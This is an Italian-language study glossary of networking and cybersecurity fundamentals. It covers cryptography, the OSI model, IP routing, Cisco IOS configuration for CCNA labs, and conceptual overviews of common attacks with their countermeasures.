🔍 Ctrl K
01

Fondamenti di Sicurezza

CVE — Common Vulnerabilities and Exposures

Identificatore pubblico univoco per ogni vulnerabilità nota. Formato: CVE-ANNO-NUMERO (es. CVE-2021-44228 = Log4Shell). Database ufficiale: NVD (National Vulnerability Database) del NIST.

CVSS — Common Vulnerability Scoring System

Punteggio 0–10 che valuta la gravità di una CVE. Considera: vettore d'attacco, complessità, privilegi richiesti, impatto su riservatezza, integrità e disponibilità.

None
0.0
Low
0.1–3.9
Medium
4.0–6.9
High
7.0–8.9
Critical
9.0–10
💡 CVSS ≥ 9.0 = CRITICO → patching immediato. Un 0-Day con CVSS alto è la combinazione più pericolosa.
0-Day / Zero-Day

Vulnerabilità scoperta e sfruttabile per cui NON esiste ancora una patch.

  1. Vulnerabilità scoperta
  2. Segnalazione → apertura CVE
  3. Il produttore sviluppa la patch
  4. Patch distribuita e installata
SOC & CISO

SOC (Security Operations Center): unità H24/365 per monitoraggio, threat detection, incident response e threat intelligence.

CISO (Chief Information Security Officer): responsabile della strategia di sicurezza. Riporta al CEO/CTO. Definisce policy, budget e compliance (GDPR, ISO 27001).

Patch Management

Processo continuo: inventario asset → scansione CVE → prioritizzazione CVSS → test staging → deploy → verifica.

⚠️ La finestra tra pubblicazione CVE e deploy della patch è il periodo di massima esposizione. Virtual patching via WAF come soluzione temporanea.
02

Logica Booleana

Operatori Booleani & Circuiti Logici

Un circuito booleano è una rete di porte logiche (gate) che implementano operazioni su bit (0/1) — il fondamento di ogni sistema digitale.

OperatoreSimboloOutputUso in cybersecurity
AND& ∧1 solo se entrambi 1Subnet mask, filtri ACL
OR| ∨1 se almeno uno è 1Regole firewall
NOT! ¬Inverte il bitWildcard mask Cisco
XOR^ ⊕1 se sono diversiRAID 5/6, AES, OTP
NAND!(A&B)Opposto ANDUniversale: qualsiasi circuito
NOR!(A|B)Opposto ORUniversale come NAND
AND applicato alla Subnet Mask

La subnet mask funziona con un AND bit a bit tra IP e maschera → risultato = indirizzo di rete.

IP:    192.168.1.10  →  11000000.10101000.00000001.00001010
Mask:  255.255.255.0  →  11111111.11111111.11111111.00000000
AND:   192.168.1.0   →  11000000.10101000.00000001.00000000

Bit mask=1 → parte RETE (fissa)
Bit mask=0 → parte HOST (variabile)
💡 XOR è fondamentale in RAID 5/6 e AES. AND è la base di subnet mask e ACL.
03

Crittografia

Hash & Digest

Funzione UNIDIREZIONALE: trasforma dati di qualsiasi dimensione in una stringa fissa di caratteri esadecimali. Dall'hash è computazionalmente impossibile risalire ai dati originali.

  • Integrità file: confronta hash scaricato con quello ufficiale
  • Password: hashate con SALT univoco → anche in caso di breach l'attaccante ha solo hash
  • Blockchain: ogni blocco contiene l'hash del precedente → modificarlo invalida la catena
AlgoritmoBitSicurezzaUso
MD5128❌ InsicuroSolo checksum rapidi
SHA-1160❌ DeprecatoLegacy
SHA-256256✔ SicuroTLS, firme, Bitcoin
bcrypt/Argon2var.✔✔Password: lenti by design
"ciao" → b94f6f125c79e3a5ffaa826f584c10d52ada669e6762051b826b55776d05a8df
Crittografia Simmetrica
Chiave unica

Mittente e destinatario usano la stessa chiave per cifrare e decifrare. Veloce, adatta a grandi volumi di dati.

AlgoritmoChiaveStatoUso
DES56 bit❌ DeprecatoLegacy
3DES112/168 bit❌ DeprecatoLegacy
AES-128128 bit✔ SicuroWPA2, TLS, disco
AES-256256 bit✔✔ Standard oroVPN, full-disk, gov
ChaCha20256 bit✔ SicuroTLS mobile
⚠️ Il problema della simmetrica è lo scambio sicuro della chiave — risolto dalla crittografia asimmetrica.
Crittografia Asimmetrica
Coppia chiavi

Coppia di chiavi matematicamente legate: chiave pubblica (distribuibile) e chiave privata (segreta). Ciò che cifra una, decifra solo l'altra.

ScenarioChiave pubblicaChiave privata
Cifrare messaggioCifra (destinatario)Decifra (destinatario)
Firma digitaleVerifica firmaCrea firma (mittente)
AlgoritmoBase matematicaUso tipico
RSA-2048/4096Fattorizzazione numeri grandiTLS, SSH, firme
ECC (P-256, P-384)Curve ellitticheTLS moderno, mobile
Diffie-HellmanLogaritmo discretoScambio chiave di sessione TLS
💡 In pratica: asimmetrica per scambiare la chiave di sessione → poi simmetrica (AES) per la velocità. È il cuore di TLS.
PKI — Public Key Infrastructure
X.509

Infrastruttura gerarchica che gestisce il ciclo di vita dei certificati digitali, garantendo l'autenticità delle chiavi pubbliche.

ComponenteRuolo
Root CAAutorità suprema, tenuta offline per sicurezza
Intermediate CAEmette certificati end-entity per conto della Root
Certificato X.509Lega chiave pubblica a identità (dominio, persona, org.)
CRLCertificate Revocation List — elenco certificati revocati
OCSPVerifica real-time validità certificato (alternativa a CRL)
Wildcard cert*.dominio.it copre tutti i sottodomini di primo livello
TLS/SSL — Transport Layer Security
L6 · Porta 443

Protocollo che garantisce riservatezza, integrità e autenticazione nelle comunicazioni. SSL è il predecessore deprecato.

VersioneStato
SSL 2.0 / 3.0❌ Deprecato (POODLE, DROWN)
TLS 1.0 / 1.1❌ Deprecato (RFC 8996, 2021)
TLS 1.2✔ Accettabile (usare con cipher suite forti)
TLS 1.3✔✔ Standard attuale — handshake più veloce e sicuro

Handshake TLS 1.3 (semplificato): ClientHello → ServerHello + certificato → verifica CA → chiave di sessione ECDHE → dati cifrati AES-GCM.

💡 HTTPS = HTTP + TLS. Il lucchetto indica TLS attivo ma non garantisce che il sito sia legittimo — il phishing usa HTTPS!
Firma Digitale
Non ripudio

Garantisce autenticità (chi ha firmato), integrità (il documento non è stato alterato) e non ripudio (il mittente non può negare).

  1. Il mittente calcola l'hash del documento (es. SHA-256)
  2. Cifra l'hash con la propria chiave privata → firma digitale
  3. Il destinatario decifra la firma con la chiave pubblica del mittente
  4. Confronta l'hash ottenuto con quello ricalcolato sul documento ricevuto
✔ Se gli hash coincidono: documento integro e mittente autentico. Algoritmi usati: RSA+SHA256, ECDSA, EdDSA.
04

Modello OSI — 7 Livelli

ISO/IEC 7498-1 — I sette livelli della comunicazione
#NomeFunzioneEsempi
7ApplicazioneServizi per l'utenteHTTP, FTP, DNS, SSH, SNMP
6PresentazioneFormato, compressione, cifraturaTLS, JPEG, ASCII
5SessioneApertura/chiusura sessioniNetBIOS, RPC
4TrasportoComunicazione end-to-endTCP, UDP
3ReteInstradamento pacchettiIP, ICMP, OSPF, RIP
2Data LinkFrame, MAC, erroriEthernet, Wi-Fi, ARP
1FisicoSegnali elettrici/otticiCavi, fibra, onde radio
💡 WAF=L7 · Firewall=L3/L4 · TCP/UDP=L4 · IP=L3 · MAC/Ethernet=L2 · Cavi=L1
05

Struttura di un Indirizzo IP

IPv4 — Come è fatto

32 bit = 4 ottetti decimali separati da punti. Ogni ottetto: 0–255.

192   .  168   .    1   .   10
11000000.10101000.00000001.00001010

→ Parte di RETE  : determinata dalla subnet mask
→ Parte di HOST  : identifica il singolo dispositivo

IPv6: 128 bit, 8 gruppi esadecimali. 2001:db8::1 (:: = gruppi di zeri omessi)

Classi IPv4 & Indirizzi privati (RFC 1918)
ClasseIntervalloMaskHostUso
A1.x – 126.x/816.7MGrandi ISP
B128.x – 191.x/1665.534Reti medie
C192.x – 223.x/24254LAN piccole
D224.x – 239.xMulticast

Privati RFC 1918 (non instradati su Internet): 10.0.0.0/8 · 172.16.0.0/12 · 192.168.0.0/16

Speciali: 127.0.0.1 loopback · 169.254.x.x APIPA · 255.255.255.255 broadcast globale

06

Protocolli di Rete

TCP vs UDP
L4
CaratteristicaTCPUDP
Connessione✔ 3-Way Handshake❌ Nessuna
Affidabilità✔ Ritrasmissione❌ Best effort
Ordine✔ Garantito❌ Non garantito
Uso tipicoHTTP/S, SSH, FTP, emailStreaming, DNS, VoIP, gaming
💡 TCP = telefonata (connessione, ordine, conferma). UDP = radio (veloce, senza ricevuta).
Porte comuni
ServizioPortaProtoNote
HTTP80TCPWeb non cifrato
HTTPS443TCPHTTP + TLS
DNS53UDP/TCPRisoluzione nomi
SSH22TCPAccesso remoto cifrato
FTP21TCPTrasferimento file
SMTP25TCPInvio email
SNMP161UDPMonitoraggio dispositivi
NFS2049TCP/UDPFile sharing Linux
SMB445TCPFile sharing Windows
RDP3389TCPDesktop remoto Windows
Telnet23TCP❌ In chiaro
ICMP — Internet Control Message Protocol
L3

Solo diagnostica e controllo — non trasporta dati utente.

  • ping → Echo Request/Reply — verifica raggiungibilità
  • traceroute → TTL Exceeded — mappa il percorso hop per hop
  • Messaggi errore: Port Unreachable, Net Unreachable, Redirect
⚠️ Abusi: ping flood (DoS), ICMP tunneling (esfiltrazione dati nascosta dentro ping).
DNS — Domain Name System
Porta 53

Traduce nomi di dominio in IP — la rubrica di Internet. UDP per query, TCP per zone transfer.

  • A → dominio → IPv4 · AAAA → dominio → IPv6
  • MX → mail server · CNAME → alias
  • NS → nameserver autoritativo · PTR → IP → dominio (reverse)
⚠️ DNS spoofing e cache poisoning → usare DNSSEC. DNS over HTTPS (DoH) per cifrare le query.
NFS — Network File System
Porta 2049

Condivide directory tra sistemi Unix/Linux come se fossero dischi locali.

# Server — /etc/exports
/dati  192.168.1.0/24(rw,sync,no_root_squash)

# Client
mount -t nfs 192.168.1.5:/dati /mnt/condiviso
  • NFS vs SMB: NFS = Linux/Unix · SMB (445) = Windows
  • NFS vs SAN: NFS → FILE via IP · SAN → BLOCCHI via FC/iSCSI
⚠️ NFSv3 in chiaro → usare NFSv4 con Kerberos in produzione.
SNMP & OID
UDP 161

Monitora dispositivi di rete. Componenti: NMS (manager) + Agent + MIB.

  • v1/v2: community string in chiaro
  • v3: autenticazione + cifratura
OID: 1.3.6.1.2.1.1.1.0 = iso.org.dod.internet.mgmt.mib-2.system.sysDescr
07

Indirizzamento IP & Routing

Subnet & CIDR

AND bit a bit tra IP e maschera → indirizzo di rete. CIDR (/xx) supera le classi A/B/C.

CIDRMaskTotaleHost utili
/24255.255.255.0256254
/16255.255.0.065.53665.534
/8255.0.0.016.7M16.7M-2
/30255.255.255.25242 (point-to-point)
/16 vs /24 — Differenza pratica

/16: 192.168.x.x si vedono tutti direttamente → router invisibile → rete flat.

/24: 192.168.1.x NON vede 192.168.2.x → passa dal gateway → separazione reti, DMZ, VLAN.

💡 192.168.1.10 → 192.168.2.10 con /24: .10 vede che .2.10 è fuori subnet → manda al gateway → router consulta routing table → forwarda.
Gateway

Punto di uscita della rete locale. Se un host vuole raggiungere un IP fuori dalla sua subnet, invia il pacchetto al gateway che decide come instradarlo.

Routing statico vs dinamico
AspettoStaticoDinamico
ConfigurazioneManualeAutomatica
Adattamento guasti❌ No✔ Automatico
OverheadZeroCPU + banda
ScalabilitàBassaAlta
ProtocolliOSPF, RIP, BGP
OSPF — Open Shortest Path First

Link-State: ogni router conosce la mappa completa. Algoritmo Dijkstra. Metrica: costo basato su bandwidth. Converge in secondi, no limite hop. Multicast 224.0.0.5. Standard enterprise.

router ospf 1
  network 192.168.1.0 0.0.0.255 area 0
  network 10.0.0.0 0.255.255.255 area 0
RIP v1 & RIP v2

Distance Vector. Algoritmo Bellman-Ford. Metrica: hop count (max 15 — 16 = ∞). Aggiornamento ogni 30s, convergenza lenta (minuti).

CaratteristicaRIP v1RIP v2OSPF
TipoDistance VectorDistance VectorLink State
Max hop1515Nessun limite
AggiornamentoBroadcastMulticast 224.0.0.9Multicast 224.0.0.5
VLSM/CIDR
Autenticazione✔ MD5
ConvergenzaLentaLentaVeloce
⚠️ Problemi: counting to infinity · split horizon · route poisoning (metrica 16 = ∞).
SD-WAN — Software-Defined Wide Area Network

Gestisce via software più link eterogenei (MPLS, broadband, LTE, 5G) in parallelo. Failover automatico, traffic shaping per applicazione, gestione centralizzata. Costo molto inferiore a MPLS dedicato.

08

CLI — Command Line Interface

Comandi Linux — reti & sicurezza
ComandoFunzione
ip addr / ifconfigInterfacce e IP
ip route showTabella di routing
ping / tracerouteRaggiungibilità / percorso
nslookup / digQuery DNS
ss -tulpnPorte in ascolto
nmap <target>Scansione porte
tcpdump -i eth0Cattura pacchetti
iptables / ufwFirewall
ssh user@hostConnessione remota cifrata
scp / rsyncCopia file via SSH
Cisco IOS — comandi base

Livelli: > User · # Privileged (enable) · (config)# Global config

show ip interface brief     ! stato interfacce
show ip route               ! routing table
show running-config         ! config attiva
show version                ! HW e versione IOS
no shutdown                 ! attiva interfaccia
ip route 10.0.0.0 255.255.0.0 192.168.1.1  ! rotta statica
💡 no davanti a qualsiasi comando lo annulla. ? mostra l'help contestuale. Tab completa il comando.
09

Proxy Server

Forward Proxy — lato client

Si interpone tra i client interni e Internet. Il server vede solo l'IP del proxy.

Client → [Forward Proxy] → Internet → Server
  • Controllo accessi web, filtraggio contenuti, cache, logging
Proxy Trasparente vs Esplicito
AspettoEsplicitoTrasparente
Client sa del proxy✔ Sì❌ No
Config clientRichiesta (GPO/manuale)Nessuna
Aggirabile✔ Sì❌ No (NAT a livello rete)
HTTPSNativoRichiede SSL inspection
Uso tipicoAziende, scuoleISP, hotspot
Reverse Proxy — lato server

Davanti ai server backend. I client credono di parlare col server finale.

Client → Internet → [Reverse Proxy] → Server A
                                     → Server B
  • Load balancing · SSL termination · Cache · WAF integrato
# nginx reverse proxy
server { listen 443 ssl; server_name miosito.com;
  location / { proxy_pass http://backend; } }
upstream backend { server 192.168.1.10:8080; server 192.168.1.11:8080; }
💡 Forward = protegge CLIENT. Reverse = protegge SERVER. CDN come Cloudflare sono reverse proxy globali.
10

ACL — Access Control List

ACL di Filesystem

Gestisce accesso a FILE e DIRECTORY. r=read, w=write, x=execute. Deny-by-default.

alice → rw-   bob → r--   guest → ---
ACL di Rete

Filtra pacchetti su router/switch per IP, porta, protocollo. Standard: solo IP sorgente. Estesa: IP + porta + protocollo.

! Cisco IOS — ACL estesa numerata
access-list 101 permit ip 192.168.1.0 0.0.0.255 any
access-list 101 deny   ip 10.0.0.0 0.255.255.255 any
access-list 101 permit ip any any
💡 Principio minimo privilegio: ogni entità accede SOLO a ciò di cui ha bisogno.
11

Infrastruttura & RAID

NAS vs SAN vs CSV
AspettoNASSAN
AccessoFILE (SMB, NFS)BLOCCO (FC, iSCSI)
ReteIP condivisaRete dedicata
PrestazioniModerateAltissime
CostoBassoAlto
UsoFile sharing, backupDB mission-critical, VM

CSV (Comma-Separated Values): formato testo per dati tabellari — universale per import/export, log, data science.

RAID — Redundant Array of Independent Disks
RAID 0
Striping
Velocità max. Zero ridondanza: un disco rotto = tutto perso.
RAID 1
Mirroring
Copia esatta su 2 dischi. Ottima ridondanza, spazio dimezzato.
RAID 2
Bit striping + ECC
Storico, codice Hamming. Praticamente mai usato.
RAID 5
Stripe + parità XOR
Tolera 1 disco rotto. Parità distribuita (XOR). Min. 3 dischi.
RAID 6
Doppia parità
Tolera 2 dischi rotti. Min. 4 dischi. Più lento in scrittura.
RAID 1+0
Mirror → Stripe
Prima mirror, poi stripe. Prestazioni + ridondanza premium.
RAID 0+1
Stripe → Mirror
Prima stripe, poi mirror. Meno resiliente di RAID 10.
RAID 5 — 3 dischi:
D1: A1   D2: A2   D3: parità(A1 XOR A2)
D1: par  D2: B1   D3: B2   ← parità ruota
💡 RAID 0=velocità · RAID 5=compromesso · RAID 6=RAID5+rete sicurezza · RAID 10=enterprise premium.
Hypervisor Type 1 & Type 2
AspettoType 1 — Bare MetalType 2 — Hosted
Gira suDirettamente sull'HWSopra un OS esistente
PrestazioniMassimeOverhead maggiore
UsoDatacenter enterpriseSviluppo, lab, desktop
EsempiVMware ESXi, Hyper-V, KVMVirtualBox, VMware WS
12

Linux — Libretto completo

Linux ha una pagina dedicata

Il libretto Linux è un documento completo con 7 capitoli: introduzione, distribuzioni, filesystem, comandi shell, utenti e permessi, Bash scripting, networking. Ha la sua sidebar di navigazione e lo stesso stile di questo glossario.

🐧
Apri il Libretto Linux

Filesystem · Comandi shell · sed · find · Bash scripting · Permessi · SSH · nmap e molto altro.

7 capitoli · contenuto completo
Script Bash — Progetto GOL CyberSecurity

Script Bash sviluppati durante lo stage formativo del Progetto GOL. Terminale interattivo con esecuzione simulata, codice sorgente e documentazione.

🖥️
DevShell — Progetto GOL CyberSecurity

grep · bc · tr · cut · shuf · /dev/urandom — Script di Ottavia, Marcello e Claudio.

portfolio2026-04.web.app
💡 Seleziona uno script dal pannello e premi ESEGUI per vedere la simulazione nel terminale interattivo.
13

Cisco Packet Tracer & CCNA

Cos'è Cisco Packet Tracer
Simulatore

Packet Tracer è il simulatore di rete gratuito di Cisco, fondamentale per prepararsi al CCNA. Permette di costruire topologie virtuali, configurare router e switch con la CLI IOS reale, e verificare la connettività senza hardware fisico.

  • Download gratuito su netacad.com (richiede account Cisco NetAcademy)
  • Supporta router, switch, hub, firewall, server, PC, wireless
  • Modalità Realtime (traffico reale) e Simulation (analisi frame per frame)
  • File con estensione .pkt — salvano l'intera topologia
💡 Nella modalità Simulation puoi vedere ogni pacchetto ICMP, ARP, TCP SYN — essenziale per capire cosa succede davvero in rete.
Topologie tipiche in Packet Tracer

Le topologie più usate nei lab CCNA:

  • Router-on-a-stick: un router con sotto-interfacce per routing inter-VLAN (1 cavo trunk ↔ switch)
  • Three-tier: Core switch → Distribution switch → Access switch (modello enterprise Cisco)
  • WAN point-to-point: due router collegati con link seriale, protocollo PPP o HDLC
  • Hub-and-spoke: un router centrale (hub) collegato a più router periferici (spoke)
Esempio topologia base CCNA:
PC1 ─── SW1 ─── R1 ─── R2 ─── SW2 ─── PC2
          |              |
        VLAN 10        VLAN 20
(192.168.10.0/24)  (192.168.20.0/24)
CLI IOS — Configurazione completa Router
IOS

Sequenza completa di configurazione di un router da zero:

! ── Accesso e modalità ────────────────────────────────────── Router> enable ! entra in privileged mode Router# configure terminal ! entra in global config Router(config)# hostname R1 ! imposta nome dispositivo ! ── Sicurezza base ─────────────────────────────────────────── R1(config)# enable secret cisco123 ! password enable cifrata R1(config)# service password-encryption ! cifra tutte le password R1(config)# banner motd #ACCESSO AUTORIZZATO SOLO# R1(config)# no ip domain-lookup ! evita lag DNS su typo ! ── Interfaccia LAN ────────────────────────────────────────── R1(config)# interface GigabitEthernet0/0 R1(config-if)# ip address 192.168.1.1 255.255.255.0 R1(config-if)# description LAN-Principale R1(config-if)# no shutdown ! attiva l'interfaccia R1(config-if)# exit ! ── Interfaccia WAN (verso R2) ─────────────────────────────── R1(config)# interface GigabitEthernet0/1 R1(config-if)# ip address 10.0.0.1 255.255.255.252 R1(config-if)# no shutdown R1(config-if)# exit ! ── Rotta statica verso rete remota ────────────────────────── R1(config)# ip route 192.168.2.0 255.255.255.0 10.0.0.2 ! ── SSH (al posto di Telnet) ───────────────────────────────── R1(config)# ip domain-name lab.local R1(config)# crypto key generate rsa modulus 2048 R1(config)# ip ssh version 2 R1(config)# username admin secret cisco123 R1(config)# line vty 0 4 R1(config-line)# transport input ssh R1(config-line)# login local R1(config-line)# exit ! ── Salvataggio ────────────────────────────────────────────── R1(config)# end R1# copy running-config startup-config ! o: write memory
VLAN & Trunking
L2

VLAN (Virtual LAN): segmentazione logica di una rete fisica. Dispositivi sulla stessa VLAN comunicano tra loro senza router, ma tra VLAN diverse serve il routing (L3).

! ── Creazione VLAN su Switch ───────────────────────────────── SW1(config)# vlan 10 SW1(config-vlan)# name UFFICI SW1(config-vlan)# exit SW1(config)# vlan 20 SW1(config-vlan)# name SERVER SW1(config-vlan)# exit ! ── Porta Access (PC appartiene a una sola VLAN) ───────────── SW1(config)# interface Fa0/1 SW1(config-if)# switchport mode access SW1(config-if)# switchport access vlan 10 SW1(config-if)# exit ! ── Porta Trunk (trasporta più VLAN — verso router o switch) ─ SW1(config)# interface Fa0/24 SW1(config-if)# switchport mode trunk SW1(config-if)# switchport trunk encapsulation dot1q ! se richiesto SW1(config-if)# switchport trunk allowed vlan 10,20 SW1(config-if)# exit ! ── Verifica ───────────────────────────────────────────────── SW1# show vlan brief SW1# show interfaces trunk
💡 La VLAN 1 è la VLAN nativa di default — per sicurezza cambiala sempre con un'altra. Le porte trunk usano 802.1Q (dot1q) per taggare i frame con l'ID VLAN.
STP — Spanning Tree Protocol
IEEE 802.1D

STP previene i loop di rete bloccando le porte ridondanti. Elegge un Root Bridge (lo switch con il Bridge ID più basso = priorità + MAC). Le altre porte diventano Root Port, Designated Port o Blocked Port.

  • RSTP (802.1w): Rapid STP — convergenza in 1-2 secondi invece di 30-50s
  • PVST+: Per-VLAN STP di Cisco — un'istanza STP per ogni VLAN
  • PortFast: salta gli stati STP sulle porte access (PC diretti) — convergenza immediata
! Imposta priorità Root Bridge (più basso = più probabile root) SW1(config)# spanning-tree vlan 10 priority 4096 ! PortFast su porta PC SW1(config-if)# spanning-tree portfast ! Verifica SW1# show spanning-tree vlan 10
DHCP — Dynamic Host Configuration Protocol
UDP 67/68

Assegna automaticamente IP, subnet mask, gateway e DNS ai client. Sequenza: DORA — Discover → Offer → Request → Acknowledge.

! ── DHCP Server su Router ──────────────────────────────────── R1(config)# ip dhcp excluded-address 192.168.1.1 192.168.1.20 ! escludi IP statici R1(config)# ip dhcp pool LAN-POOL R1(dhcp-config)# network 192.168.1.0 255.255.255.0 R1(dhcp-config)# default-router 192.168.1.1 R1(dhcp-config)# dns-server 8.8.8.8 R1(dhcp-config)# lease 7 ! lease 7 giorni R1(dhcp-config)# exit ! ── DHCP Relay (se il server è su un'altra subnet) ─────────── R1(config-if)# ip helper-address 192.168.2.100 ! IP del server DHCP ! ── Verifica ───────────────────────────────────────────────── R1# show ip dhcp binding R1# show ip dhcp pool
NAT & PAT — Network/Port Address Translation
L3

NAT traduce indirizzi IP privati in pubblici. PAT (NAT overload) usa anche le porte — permette a molti host interni di condividere un singolo IP pubblico.

! ── PAT (NAT Overload) — il più comune ────────────────────── R1(config)# access-list 1 permit 192.168.1.0 0.0.0.255 ! ACL degli host interni R1(config)# interface Gi0/0 ! interfaccia LAN = inside R1(config-if)# ip nat inside R1(config-if)# exit R1(config)# interface Gi0/1 ! interfaccia WAN = outside R1(config-if)# ip nat outside R1(config-if)# exit R1(config)# ip nat inside source list 1 interface Gi0/1 overload ! ── Verifica ───────────────────────────────────────────────── R1# show ip nat translations R1# show ip nat statistics
💡 NAT statico: 1 IP privato ↔ 1 IP pubblico. NAT dinamico: pool di IP pubblici. PAT (overload): tutti gli host interni → 1 IP pubblico con porte diverse.
ACL in IOS — Standard & Estesa
Sicurezza
! ── ACL Standard (1-99): filtra solo IP sorgente ───────────── R1(config)# access-list 10 permit 192.168.1.0 0.0.0.255 R1(config)# access-list 10 deny any ! Applica sull'interfaccia (più vicino alla destinazione) R1(config-if)# ip access-group 10 out ! ── ACL Estesa (100-199): filtra IP + porta + protocollo ───── R1(config)# access-list 101 permit tcp 192.168.1.0 0.0.0.255 any eq 80 R1(config)# access-list 101 permit tcp 192.168.1.0 0.0.0.255 any eq 443 R1(config)# access-list 101 deny ip any any ! Applica (più vicino alla sorgente per le estese) R1(config-if)# ip access-group 101 in ! ── ACL Named (più leggibile) ──────────────────────────────── R1(config)# ip access-list extended BLOCCA-TELNET R1(config-ext-nacl)# deny tcp any any eq 23 R1(config-ext-nacl)# permit ip any any ! Verifica R1# show access-lists
💡 Regola d'oro: ACL standard → applica vicino alla DESTINAZIONE. ACL estesa → applica vicino alla SORGENTE. Esiste sempre un "deny any" implicito alla fine.
OSPF in IOS — Configurazione completa
Dinamico L3
! ── OSPF base su R1 ────────────────────────────────────────── R1(config)# router ospf 1 ! process-id locale (1-65535) R1(config-router)# router-id 1.1.1.1 ! ID univoco del router R1(config-router)# network 192.168.1.0 0.0.0.255 area 0 R1(config-router)# network 10.0.0.0 0.0.0.3 area 0 R1(config-router)# passive-interface Gi0/0 ! non invia hello sulla LAN R1(config-router)# exit ! ── Verifica ───────────────────────────────────────────────── R1# show ip ospf neighbor ! router vicini OSPF R1# show ip ospf database ! LSDB (mappa rete) R1# show ip route ospf ! rotte apprese da OSPF R1# show ip protocols ! protocolli attivi
💡 La wildcard mask è l'inverso della subnet mask: /24 → 0.0.0.255 · /30 → 0.0.0.3 · /8 → 0.255.255.255. Area 0 = backbone OSPF, obbligatoria.
Troubleshooting — Comandi diagnostici IOS
ping 192.168.1.1

Testa ICMP verso un host

traceroute 8.8.8.8

Mappa percorso hop per hop

show ip route

Tabella di routing completa

show ip interface brief

Stato tutte le interfacce

show interfaces Gi0/0

Dettaglio interfaccia: errori, counters

show arp

Tabella ARP: IP ↔ MAC

show mac address-table

Tabella MAC dello switch

show cdp neighbors

Dispositivi Cisco vicini (CDP)

debug ip ospf events

Debug OSPF in tempo reale

debug ip rip

Debug RIP in tempo reale

show ip nat translations

Traduzioni NAT attive

show vlan brief

VLAN configurate e porte

💡 Metodologia OSI bottom-up: inizia dal L1 (cavi, LED) → L2 (CDP, MAC) → L3 (ping, route) → L4 (porte) → L7 (applicazione). Isola il livello del problema.
Concetti chiave per il CCNA
Esame
ArgomentoConcetto chiave da ricordare
SubnettingFormula: 2^n host − 2 (rete + broadcast). 2^m subnet. /30 = 2 host (point-to-point)
Wildcard maskInverso della subnet: 255.255.255.0 → 0.0.0.255
OSI vs TCP/IPTCP/IP ha 4 livelli: App (L5-7) · Trasporto (L4) · Internet (L3) · Accesso rete (L1-2)
STPRoot Bridge = priorità più bassa. Default: 32768. PortFast solo su porte access.
VLANAccess = una VLAN · Trunk = più VLAN con tag 802.1Q · VLAN nativa = non taggata
NATInside local = IP privato · Inside global = IP pubblico · Outside = destinazione
OSPFHello ogni 10s, Dead ogni 40s. Stessi area, hello, dead, password → diventano neighbor
DHCP DORADiscover (broadcast) · Offer · Request · Acknowledge
CDPCisco Discovery Protocol: scopre automaticamente i vicini Cisco diretti (L2)
Sicurezza switchPort security: limita MAC su una porta. Violazione: shutdown / restrict / protect
💡 CCNA 200-301: 120 minuti, 100-120 domande (mix/drag&drop/lab). Argomenti: reti, routing, switching, wireless, sicurezza, automazione. Usa Packet Tracer + Boson ExSim per la simulazione d'esame.
14

Sicurezza Applicativa

WAF — Web Application Firewall
L7

Analizza e filtra HTTP/HTTPS. Opera a Livello 7 — ispeziona il payload. Blocca: SQL Injection, XSS, CSRF, Path Traversal.

💡 WAF (L7) + Firewall (L3/L4) = difesa in profondità. Non si sostituiscono.
CA — Certification Authority & Wildcard

CA: emette certificati X.509. PKI: CA root → CA intermedie → certificati end-entity. CRL/OCSP: revoca.

Wildcard: *.dominio.com protegge tutti i sottodomini con un unico certificato.

Honeypot · SSH vs Telnet · Print Server
  • Honeypot: sistema vulnerabile usato come esca per studiare gli attaccanti
  • Telnet (23): ❌ In chiaro — deprecato
  • SSH (22): ✔ Cifrato — standard odierno
  • Print Server: vettore di attacco laterale spesso trascurato
15

Attacchi Informatici

MitM — Man in the Middle

L'attaccante si interpone intercettando o alterando il traffico.

  • ARP Poisoning · DNS Spoofing · SSL Stripping · Evil Twin

Contromisure: HTTPS+HSTS · certificati client · VPN · DNSSEC · 802.1X

Brute Force & Varianti
TecnicaMetodoNote
Brute ForceTutte le combinazioniLento ma garantisce successo
Dictionary AttackDizionario password comuniMolto più veloce
Credential StuffingCredenziali da breach realiSfrutta riuso password
Password Spraying1-2 pass su migliaia accountEvita lockout
Rainbow TableTabella hash→passwordInutile con SALT
🛡️ Contromisure: password ≥12 char · MFA · lockout progressivo · SALT + bcrypt/Argon2.
Malware — Tipologie
Codice malevolo
TipoComportamentoEsempio noto
VirusSi replica infettando altri file eseguibiliILOVEYOU
WormSi propaga autonomamente in rete, senza file hostWannaCry, Conficker
TrojanSi camuffa da software legittimo, apre backdoorEmotet, Zeus
RansomwareCifra i dati e chiede riscattoWannaCry, LockBit
SpywareRaccoglie dati senza consenso (tastiera, schermo, mic)FinFisher
KeyloggerRegistra i tasti premuti → credenzialiBlackShades
RootkitNasconde la propria presenza nel kernel/OSStuxnet
AdwareMostra pubblicità indesiderata, può reindirizzare browserFireball
BotnetRete di macchine zombi controllate dal C&C serverMirai (IoT)
RATRemote Access Trojan — controllo remoto completoDarkComet
⚠️ Un malware può combinare più tipologie: WannaCry era worm + ransomware. Stuxnet era worm + rootkit + PLC exploit.
Phishing & Social Engineering
Fattore umano

Il social engineering manipola psicologicamente le persone per ottenere credenziali, accessi o informazioni riservate, sfruttando fiducia, urgenza e paura.

VarianteDescrizione
PhishingEmail massiva che imita brand legittimi (banca, Microsoft…)
Spear phishingPhishing mirato su persona specifica con dati personalizzati
WhalingSpear phishing verso CEO/dirigenti per grosse somme o dati critici
SmishingPhishing via SMS
VishingPhishing via chiamata vocale (finto supporto IT, banca…)
PretextingCrea scenario credibile (tecnico IT, auditor, fornitore)
BaitingUSB abbandonata con malware, download gratuito infetto
TailgatingAccesso fisico seguendo una persona autorizzata (piggybacking)
Quid pro quoOffre un servizio falso in cambio di informazioni (finto helpdesk)
💡 Contromisura principale: formazione continua. Il firewall non blocca un utente che consegna volontariamente le credenziali.
Ransomware
Cifratura + Riscatto

Cifra i file della vittima e chiede un riscatto (in criptovaluta) per la chiave di decifratura. Le varianti moderne usano doppia estorsione: cifra + esfiltrazione dati.

  1. Infezione: phishing, RDP esposto, vulnerabilità non patchata, supply chain
  2. Persistence & movimento laterale: si diffonde nella rete, eleva i privilegi
  3. Esfiltrazione (RaaS moderno): copia dati verso server C&C dell'attaccante
  4. Cifratura: AES per i file, RSA/ECC per proteggere la chiave AES
  5. Riscatto: richiesta in Bitcoin/Monero con timer, minaccia di pubblicare i dati
⚠️ Contromisure: backup offline 3-2-1, segmentazione di rete, no RDP esposto, patch management, EDR, principio del minimo privilegio.
DoS & DDoS
Disponibilità

DoS: un singolo attaccante satura le risorse del target. DDoS: migliaia di macchine (botnet) colpiscono simultaneamente.

TipoLivello OSITecnica
VolumetricoL3/L4UDP/ICMP flood — satura la banda (Gbps)
SYN FloodL4TCP handshake incompleti — esaurisce connessioni
HTTP FloodL7Richieste GET/POST legittime in massa
